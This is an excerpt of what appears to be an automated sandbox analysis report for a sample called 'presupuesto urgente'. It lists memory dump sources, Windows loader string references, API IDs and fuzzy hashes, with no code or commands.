                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                      • API String ID: 0-1388552009
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$$
                                                                                                                                                      • API String ID: 3446177414-233714265
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                      • API String ID: 0-118005554
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: R3$ R3
                                                                                                                                                      • API String ID: 0-1334182836
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .Local\$@
                                                                                                                                                      • API String ID: 0-380025441
                                                                                                                                                      Strings
                                                                                                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 335A289A
                                                                                                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 335A289F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                      • API String ID: 0-2653619699
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: MUI
                                                                                                                                                      • API String ID: 0-1339004836
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @[b3@[b3
                                                                                                                                                      • API String ID: 0-3711319441
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      APIs
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      APIs
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      APIs
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      APIs
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: #%u
                                                                                                                                                      • API String ID: 0-232158463
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0hb3
                                                                                                                                                      • API String ID: 0-2142295318
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: EXT-
                                                                                                                                                      • API String ID: 0-1948896318
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: BinaryHash
                                                                                                                                                      • API String ID: 0-2202222882
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: R3
                                                                                                                                                      • API String ID: 0-2736822740
                                                                                                                                                      • Opcode ID: 57c84285a1c3305d5f7ab28233b600f3607e32dc677f9e720c7268e13b18e9f8
                                                                                                                                                      • Instruction ID: c53614bc8ed9e02f5c33d33b347baae8f9a59b7b208396dfc9d5d235ae9aa028
                                                                                                                                                      • Opcode Fuzzy Hash: 57c84285a1c3305d5f7ab28233b600f3607e32dc677f9e720c7268e13b18e9f8
                                                                                                                                                      • Instruction Fuzzy Hash: C44180B26017419FE328CF68E880A12F7F9FF4A324B54496DD49787A50EB74E456CB90
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Flst
                                                                                                                                                      • API String ID: 0-2374792617
                                                                                                                                                      • Opcode ID: a262699f8be54a9ea8786708bfd76686d080cffe0c1c5224bab7e06b7e5137cd
                                                                                                                                                      • Instruction ID: 43595eb42852485b8aa5659001a24acdb264e9b1f49c172f5f161c53e6d8d00d
                                                                                                                                                      • Opcode Fuzzy Hash: a262699f8be54a9ea8786708bfd76686d080cffe0c1c5224bab7e06b7e5137cd
                                                                                                                                                      • Instruction Fuzzy Hash: E941B8B0608301DFD305CF18E180A0AFBE4EF99718F5485AEE4998F291DB71C986CB91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: BinaryName
                                                                                                                                                      • API String ID: 0-215506332
                                                                                                                                                      • Opcode ID: cb3681ea005ed0a41e3e3fa9a58087d4aa8da4f62245c4d78f571f494e3c40ca
                                                                                                                                                      • Instruction ID: a6f45f22af79fd04094b1d4e2ac88695a9466245b72dbde7274e41ae18b65482
                                                                                                                                                      • Opcode Fuzzy Hash: cb3681ea005ed0a41e3e3fa9a58087d4aa8da4f62245c4d78f571f494e3c40ca
                                                                                                                                                      • Instruction Fuzzy Hash: BB31D4BA900615AFEB16CA5CE845E6FB774EF80720F42452DE811E7650DB309E04D7A0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 48b89eb27b2891dcd63258d36eda3459f070383e60ccd1e554aa99273424bcbe
                                                                                                                                                      • Instruction ID: 1c494de7315502397c92b50ba10b7c8e7ee914f9884eb1424ddeb9fec115e24e
                                                                                                                                                      • Opcode Fuzzy Hash: 48b89eb27b2891dcd63258d36eda3459f070383e60ccd1e554aa99273424bcbe
                                                                                                                                                      • Instruction Fuzzy Hash: D142A175B006268FDB08CF59D4806AEB7B6FF88354F58855DE852AF750DB34E842CBA0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 5eb69599ece41f9bddc854eab2c6f74522fd5e194659415b5d04e02631d321bb
                                                                                                                                                      • Instruction ID: a1a61e74c36c119907040765fb6170d7d5fbdd496ffe0ce82cba999b937934c7
                                                                                                                                                      • Opcode Fuzzy Hash: 5eb69599ece41f9bddc854eab2c6f74522fd5e194659415b5d04e02631d321bb
                                                                                                                                                      • Instruction Fuzzy Hash: 05321F78A01754CFFB14CFA9E850BEEB7F2AF84750F64451DD4899B684DB34A80ACB50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 571971f75e22bad48202ee9020ed98b44104307600695981eebb404cda43ae20
                                                                                                                                                      • Instruction ID: f4f3acd7024e28af053962d5ea311ecbc92184f4405d366bf6a0407d00d27e9d
                                                                                                                                                      • Opcode Fuzzy Hash: 571971f75e22bad48202ee9020ed98b44104307600695981eebb404cda43ae20
                                                                                                                                                      • Instruction Fuzzy Hash: FB22B275A00216CFDB09CF99D490AAEB3F6BF88344F58856DD855DB384DB31EA42CB90
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 8c199533aa3d8d1da1d5ef20d487a6e3d56d5f553da7805e2735adbec5fe4152
                                                                                                                                                      • Instruction ID: 705d78cf909c6ede4c538f4ddd9b3d146a2205d489b57c561f3f28acbc5e160a
                                                                                                                                                      • Opcode Fuzzy Hash: 8c199533aa3d8d1da1d5ef20d487a6e3d56d5f553da7805e2735adbec5fe4152
                                                                                                                                                      • Instruction Fuzzy Hash: E0D12871B007169FDB04CFA4E890BAE7BB9BF44345F494629E861DB6D0EB30E945CB90
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0e7fb0d4f3a1f730fb2c47a19b4763350d996b6c908d86c0af96bca9ad7a9a78
                                                                                                                                                      • Instruction ID: f449336496aedd0f9ab5427c3d2b8f99985754cbc77b441ecd44e8d1a07d81f7
                                                                                                                                                      • Opcode Fuzzy Hash: 0e7fb0d4f3a1f730fb2c47a19b4763350d996b6c908d86c0af96bca9ad7a9a78
                                                                                                                                                      • Instruction Fuzzy Hash: FBC1B075E01306DFEB14CF58D840BAEB7B6EF95320F588269E855EB280D774E941CB90
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c5522bfcf45835f2a136ce07db2e44da20bc7e5433dda893e00af24d5f53a96f
                                                                                                                                                      • Instruction ID: e218b063a4d3ea3a856156742cf5474be41cd64be1b3c761f3f0517e800e36e7
                                                                                                                                                      • Opcode Fuzzy Hash: c5522bfcf45835f2a136ce07db2e44da20bc7e5433dda893e00af24d5f53a96f
                                                                                                                                                      • Instruction Fuzzy Hash: 9DD102B5900618DFDB45CF68D990B8A7BF9BF49340F4444BAED09DB216EB31D905CBA0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c8cbcfafc3a2cfacd5ff0d850c0fd6d8cbc95926807658e2e12f7d3a1c46658f
                                                                                                                                                      • Instruction ID: c8229a9cd50a03991d48969b3696282eea86d41b256136012d7724dd33bf73f5
                                                                                                                                                      • Opcode Fuzzy Hash: c8cbcfafc3a2cfacd5ff0d850c0fd6d8cbc95926807658e2e12f7d3a1c46658f
                                                                                                                                                      • Instruction Fuzzy Hash: 27C1F375E053218BEB08CF1CE490BB9B7F5FB88B44F5A4299E841DF295DB348941CB60
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 07c44af1c5a270a4922cfd8afeae6e55c51f03086523fd378f35a01a7dde95bb
                                                                                                                                                      • Instruction ID: 17d59be92b3c0a4c550e1e1227c2f59e86b9168db795174c557c4958f34553aa
                                                                                                                                                      • Opcode Fuzzy Hash: 07c44af1c5a270a4922cfd8afeae6e55c51f03086523fd378f35a01a7dde95bb
                                                                                                                                                      • Instruction Fuzzy Hash: 2271EFB5C05325AFEB158F59E8906EDBBF5FF89710F18412AE851AB340D7349801CBA0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4aac02388def567051e674a15a1628675f061cd51749659926745759d6f6c1c8
                                                                                                                                                      • Instruction ID: cc4c7967007e4d883671293fa85648ede59500936fa27df78dab8e0c936337ae
                                                                                                                                                      • Opcode Fuzzy Hash: 4aac02388def567051e674a15a1628675f061cd51749659926745759d6f6c1c8
                                                                                                                                                      • Instruction Fuzzy Hash: 6271E075A047618FE305CF28E480B66B7F5FF88710F0985AAE898CB752DB34D945CBA1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4462fd19dd54f8a625a33ff33b01d4044777b8a47b63b28ded0e337359dbbc40
                                                                                                                                                      • Instruction ID: c0aa265784721a8e4a5f89307f6ce1a27393a5bcdba424c5e89ed602b5671f8d
                                                                                                                                                      • Opcode Fuzzy Hash: 4462fd19dd54f8a625a33ff33b01d4044777b8a47b63b28ded0e337359dbbc40
                                                                                                                                                      • Instruction Fuzzy Hash: 39516775A09341DFD314CF29E080A1ABBF9FB89660F544A6EF59997354DB30E844CF82
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                                                                                                      • Instruction ID: 6d9b4dd25f0d3053955d1b22de4db79a41eafdf8de12c6e6f9aabd9051c14502
                                                                                                                                                      • Opcode Fuzzy Hash: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                                                                                                      • Instruction Fuzzy Hash: 6851E9B66003529BDB02AF68EC50A6F77F5EFC4694F44482AF940D7250EB34D815E7A2
                                                                                                                                                      Memory Dump Source
